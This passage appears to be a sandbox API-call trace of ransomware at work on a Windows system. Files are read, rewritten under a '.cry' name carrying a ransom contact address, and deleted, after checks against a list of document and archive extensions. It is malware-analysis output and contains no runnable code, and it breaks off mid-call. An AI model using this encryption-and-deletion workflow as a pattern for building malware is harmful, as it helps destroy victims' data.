(lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0050.334] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.334] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0050.335] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.335] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.335] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0050.335] GetLastError () returned 0x0 [0050.335] ReadFile (in: hFile=0x190, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x2a968, lpOverlapped=0x0) returned 1 [0050.418] WriteFile (in: hFile=0x1ac, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0050.421] ReadFile (in: hFile=0x190, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.421] WriteFile (in: hFile=0x1ac, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0050.421] SetEndOfFile (hFile=0x1ac) returned 1 [0050.421] CloseHandle (hObject=0x1ac) returned 1 [0050.421] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.421] SetEndOfFile (hFile=0x190) returned 1 [0050.423] CloseHandle (hObject=0x190) returned 1 [0050.423] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0050.423] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0050.423] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.423] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.423] lstrlenW (lpString=".doc") returned 4 [0050.423] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.423] lstrlenW (lpString=".docx") returned 5 [0050.423] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0050.423] lstrlenW (lpString=".pdf") returned 4 [0050.424] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.424] lstrlenW (lpString=".xls") returned 4 [0050.424] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.424] lstrlenW (lpString=".xlsx") returned 5 [0050.424] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0050.424] lstrlenW (lpString=".ppt") returned 4 [0050.424] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.424] lstrlenW (lpString=".zip") returned 4 [0050.424] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.424] lstrlenW (lpString=".rar") returned 4 [0050.424] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.424] lstrlenW (lpString=".bz2") returned 4 [0050.424] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.424] lstrlenW (lpString=".7z") returned 3 [0050.424] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.424] lstrlenW (lpString=".dbf") returned 4 [0050.424] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.424] lstrlenW (lpString=".1cd") returned 4 [0050.424] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.424] lstrlenW (lpString=".jpg") returned 4 [0050.424] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.424] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.424] lstrlenW (lpString=".doc") returned 4 [0050.424] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.424] lstrlenW (lpString=".docx") returned 5 [0050.424] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0050.424] lstrlenW (lpString=".pdf") returned 4 [0050.424] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.424] lstrlenW (lpString=".xls") returned 4 [0050.424] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.424] lstrlenW (lpString=".xlsx") returned 5 [0050.425] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0050.425] lstrlenW (lpString=".ppt") returned 4 [0050.425] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.425] lstrlenW (lpString=".zip") returned 4 [0050.425] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.425] lstrlenW (lpString=".rar") returned 4 [0050.425] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.425] lstrlenW (lpString=".bz2") returned 4 [0050.425] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.425] lstrlenW (lpString=".7z") returned 3 [0050.425] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.425] lstrlenW (lpString=".dbf") returned 4 [0050.425] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.425] lstrlenW (lpString=".1cd") returned 4 [0050.425] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.425] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0050.425] lstrlenW (lpString=".jpg") returned 4 [0050.425] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.425] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0050.425] lstrlenW (lpString="PidGenX.dll") returned 11 [0050.425] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0050.426] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1463568) returned 1 [0050.426] CloseHandle (hObject=0x190) returned 1 [0050.426] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0050.426] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.426] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0050.426] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.426] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.426] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0050.426] GetLastError () returned 0x0 [0050.426] ReadFile (in: hFile=0x190, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0050.477] WriteFile (in: hFile=0x1ac, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.618] ReadFile (in: hFile=0x190, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x65520, lpOverlapped=0x0) returned 1 [0050.632] WriteFile (in: hFile=0x1ac, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0050.644] ReadFile (in: hFile=0x190, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.644] WriteFile (in: hFile=0x1ac, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0050.644] SetEndOfFile (hFile=0x1ac) returned 1 [0050.702] CloseHandle (hObject=0x1ac) returned 1 [0050.702] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.702] SetEndOfFile (hFile=0x190) returned 1 [0050.706] CloseHandle (hObject=0x190) returned 1 [0050.706] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0050.707] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0050.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.710] lstrlenW (lpString=".doc") returned 4 [0050.710] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.710] lstrlenW (lpString=".docx") returned 5 [0050.710] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0050.710] lstrlenW (lpString=".pdf") returned 4 [0050.710] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.710] lstrlenW (lpString=".xls") returned 4 [0050.710] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.710] lstrlenW (lpString=".xlsx") returned 5 [0050.711] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0050.711] lstrlenW (lpString=".ppt") returned 4 [0050.711] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.711] lstrlenW (lpString=".zip") returned 4 [0050.711] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.711] lstrlenW (lpString=".rar") returned 4 [0050.711] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.711] lstrlenW (lpString=".bz2") returned 4 [0050.711] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.711] lstrlenW (lpString=".7z") returned 3 [0050.711] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.711] lstrlenW (lpString=".dbf") returned 4 [0050.711] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.711] lstrlenW (lpString=".1cd") returned 4 [0050.711] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.711] lstrlenW (lpString=".jpg") returned 4 [0050.711] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.711] lstrlenW (lpString=".doc") returned 4 [0050.711] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.711] lstrlenW (lpString=".docx") returned 5 [0050.711] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0050.711] lstrlenW (lpString=".pdf") returned 4 [0050.711] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.711] lstrlenW (lpString=".xls") returned 4 [0050.711] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.711] lstrlenW (lpString=".xlsx") returned 5 [0050.711] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0050.711] lstrlenW (lpString=".ppt") returned 4 [0050.711] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.711] lstrlenW (lpString=".zip") returned 4 [0050.712] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.712] lstrlenW (lpString=".rar") returned 4 [0050.712] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.712] lstrlenW (lpString=".bz2") returned 4 [0050.712] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.712] lstrlenW (lpString=".7z") returned 3 [0050.712] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.712] lstrlenW (lpString=".dbf") returned 4 [0050.712] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.712] lstrlenW (lpString=".1cd") returned 4 [0050.712] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0050.712] lstrlenW (lpString=".jpg") returned 4 [0050.712] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.712] lstrcmpiW (lpString1=".sys", lpString2=".cry") returned 1 [0050.712] lstrlenW (lpString="pagefile.sys") returned 12 [0050.712] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.712] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.712] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.712] lstrlenW (lpString=".doc") returned 4 [0050.712] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0050.713] lstrlenW (lpString=".docx") returned 5 [0050.713] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0050.713] lstrlenW (lpString=".pdf") returned 4 [0050.713] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0050.713] lstrlenW (lpString=".xls") returned 4 [0050.713] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0050.713] lstrlenW (lpString=".xlsx") returned 5 [0050.713] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0050.713] lstrlenW (lpString=".ppt") returned 4 [0050.713] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0050.713] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.713] lstrlenW (lpString=".zip") returned 4 [0050.713] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0050.713] lstrlenW (lpString=".rar") returned 4 [0050.713] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0050.713] lstrlenW (lpString=".bz2") returned 4 [0050.713] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0050.713] lstrlenW (lpString=".7z") returned 3 [0050.713] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0050.713] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.713] lstrlenW (lpString=".dbf") returned 4 [0050.713] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0050.713] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.713] lstrlenW (lpString=".1cd") returned 4 [0050.713] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0050.714] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.714] lstrlenW (lpString=".jpg") returned 4 [0050.714] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.714] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.714] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.714] lstrlenW (lpString=".doc") returned 4 [0050.714] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0050.714] lstrlenW (lpString=".docx") returned 5 [0050.714] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0050.714] lstrlenW (lpString=".pdf") returned 4 [0050.714] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0050.714] lstrlenW (lpString=".xls") returned 4 [0050.714] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0050.714] lstrlenW (lpString=".xlsx") returned 5 [0050.714] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0050.714] lstrlenW (lpString=".ppt") returned 4 [0050.714] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0050.714] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.714] lstrlenW (lpString=".zip") returned 4 [0050.714] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0050.714] lstrlenW (lpString=".rar") returned 4 [0050.714] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0050.714] lstrlenW (lpString=".bz2") returned 4 [0050.714] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0050.714] lstrlenW (lpString=".7z") returned 3 [0050.714] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0050.714] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.714] lstrlenW (lpString=".dbf") returned 4 [0050.714] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0050.714] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.715] lstrlenW (lpString=".1cd") returned 4 [0050.715] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0050.715] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0050.715] lstrlenW (lpString=".jpg") returned 4 [0050.715] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.715] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0050.715] lstrlenW (lpString="MSADDNDR.DLL") returned 12 [0050.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0050.728] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=99136) returned 1 [0050.728] CloseHandle (hObject=0x1c4) returned 1 [0050.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 0x20 [0050.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0050.728] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.728] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0050.729] GetLastError () returned 0x0 [0050.729] ReadFile (in: hFile=0x1c4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x18340, lpOverlapped=0x0) returned 1 [0050.814] WriteFile (in: hFile=0x214, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x18350, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x18350, lpOverlapped=0x0) returned 1 [0050.815] ReadFile (in: hFile=0x1c4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.815] WriteFile (in: hFile=0x214, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.816] SetEndOfFile (hFile=0x214) returned 1 [0050.816] CloseHandle (hObject=0x214) returned 1 [0050.816] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.816] SetEndOfFile (hFile=0x1c4) returned 1 [0050.817] CloseHandle (hObject=0x1c4) returned 1 [0050.817] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.817] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 1 [0050.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.818] lstrlenW (lpString=".doc") returned 4 [0050.818] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.818] lstrlenW (lpString=".docx") returned 5 [0050.818] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0050.818] lstrlenW (lpString=".pdf") returned 4 [0050.818] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.818] lstrlenW (lpString=".xls") returned 4 [0050.818] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.818] lstrlenW (lpString=".xlsx") returned 5 [0050.818] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0050.818] lstrlenW (lpString=".ppt") returned 4 [0050.818] lstrcmpiW 